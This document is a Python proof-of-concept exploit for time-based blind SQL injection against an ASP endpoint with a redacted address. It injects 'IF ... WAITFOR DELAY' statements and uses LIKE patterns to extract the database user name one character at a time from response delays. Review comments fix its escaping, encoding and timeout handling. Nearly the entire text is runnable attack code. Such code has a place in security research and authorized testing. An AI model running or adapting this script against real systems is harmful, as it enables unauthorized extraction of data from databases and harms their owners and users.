exploit to extract data with SQLi
#!/usr/bin/env python
# XXXX.asp time-based SQL injection PoC exploit
# Rafal 'bl4de' Janicki
import requests
# Base URL of the injectable endpoint. The SQL payload below is appended
# directly to this string (see the loop), so it must end exactly where the
# vulnerable GET parameter's value begins.
base_url = 'http://REDACTED :/'
# WAITFOR DELAY argument (hh:mm:ss) the server sleeps for when the injected
# IF condition is TRUE; the response-time check in the loop keys off it.
delayed = '00:00:08'
# Candidate characters tried at each position, in this order.
# NOTE(review): '_' is a LIKE single-char wildcard, so 'abc_%' matches any
# character at that position -- without escaping it as '[_]' it can win
# before the real '@', '#', '$' or '~'. '#' starts a URL fragment in a GET
# URL and is stripped before sending, so it needs to travel as %23.
# Letters appear in both cases, but with a case-insensitive collation LIKE
# will accept the uppercase candidate first -- confirm case separately.
charset = 'ABCDEFGHIJKLMNOPQRSTUWVXYZabcdefghijklmnopqrstuwvxyz 1234567890-_@#$~'
# Injected statement: the leading ' closes the original string literal, ';'
# starts a new statement, the first {} receives the prefix found so far plus
# the candidate char, %25 is a URL-encoded '%' (LIKE wildcard for the rest of
# the string), the second {} receives `delayed`, and '-- ' comments out the
# remainder of the original query.
query = "';IF (user_name() LIKE '{}%25') WAITFOR DELAY '{}'-- "
# Prefix recovered so far; pre-seed it to resume a previous run.
payload = ''
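def get_headers():
    """Return the HTTP headers sent with every probe request.

    The Cookie and Host values are placeholders for the target's session
    cookie and virtual host; fill them in locally and keep real session
    cookies out of version control. All values are strings: the original
    dict was missing the comma after the Cookie entry (a SyntaxError) and
    passed the integer ``1`` for Upgrade-Insecure-Requests, which newer
    requests versions reject as an invalid header value.
    """
    return {
        'Cookie': 'XXXX',
        'Host': 'XXXXX',
        'Pragma': 'no-cache',
        'Upgrade-Insecure-Requests': '1',
    }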
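def make_request(url, timeout=None):
    """GET ``url`` with the probe headers and return the requests Response.

    ``timeout`` is handed straight to ``requests.get``. ``None`` keeps the
    original behaviour (wait forever), which is dangerous for a time-based
    probe: a target that stalls or drops the connection blocks the whole
    extraction. Set it comfortably above the WAITFOR delay (a few times
    ``delayed``) so a hung request raises ``requests.Timeout`` instead.
    Any exception raised by requests propagates to the caller.
    """
    return requests.get(url, headers=get_headers(), timeout=timeout)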
def measure_response_time(resp):
    """Return how long ``resp`` took, in seconds, as a float.

    Reads the ``elapsed`` timedelta that requests attaches to the Response;
    the caller compares this against the WAITFOR delay to decide whether
    the injected condition evaluated TRUE.
    """
    elapsed = resp.elapsed
    return elapsed.total_seconds()
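print("[+] Query: {}".format(query.format('', delayed)))
print("[+] URL called: {}".format(base_url + query))
print("[+] delay in time-based IF set to: {}".format(delayed))

# Decision threshold derived from `delayed` (hh:mm:ss, mm:ss or ss) instead of
# a second hard-coded 8, so changing the delay can't silently desync the check.
delay_seconds = sum(
    int(part) * 60 ** pos
    for pos, part in enumerate(reversed(delayed.split(':')))
)

# Up to 10 characters are extracted per run. For longer strings either raise
# the range or re-run with `payload` pre-seeded to the prefix already found, so
# the first round looks for the next unknown character.
for _round in range(10):
    for c in charset:
        candidate = payload + c
        # '_' is a LIKE wildcard -- '[_]' makes it a literal underscore so it
        # cannot match arbitrary characters. '#' would start a URL fragment and
        # be dropped before the request is sent; %23 reaches the server as '#'.
        sql_literal = candidate.replace('_', '[_]').replace('#', '%23')
        url = base_url + query.format(sql_literal, delayed)
        resp = make_request(url)
        if measure_response_time(resp) > delay_seconds:
            payload = candidate
            print("[+] found character: {} - current string is {}".format(c, payload))
            break
    else:
        # No candidate triggered the delay: either the string ended or the
        # target stopped delaying. Repeating the same sweep would not help.
        break
print("[+] final: {}".format(payload))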